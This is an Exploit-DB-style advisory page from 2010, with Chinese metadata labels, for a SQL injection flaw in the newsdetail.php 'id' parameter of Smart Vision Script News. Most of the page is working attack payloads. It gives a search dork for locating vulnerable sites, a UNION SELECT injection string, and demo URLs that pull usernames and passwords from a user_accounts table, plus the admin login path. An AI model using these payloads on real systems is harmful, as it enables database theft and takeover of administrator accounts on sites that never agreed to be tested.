Smart Vision Script News – ‘newsdetail.php’ SQL Injection (1)

  • 作者: Err0R
    日期: 2010-01-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10977/
  • # Exploit Title: Smart Vsion Script News (newsdetail) SQL Injection Vulnerability
# Software Link: www.esmart-vision.com<http://www.esmart-vision.com/>


============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com<http://www.esmart-vision.com/>
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http:http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#============================#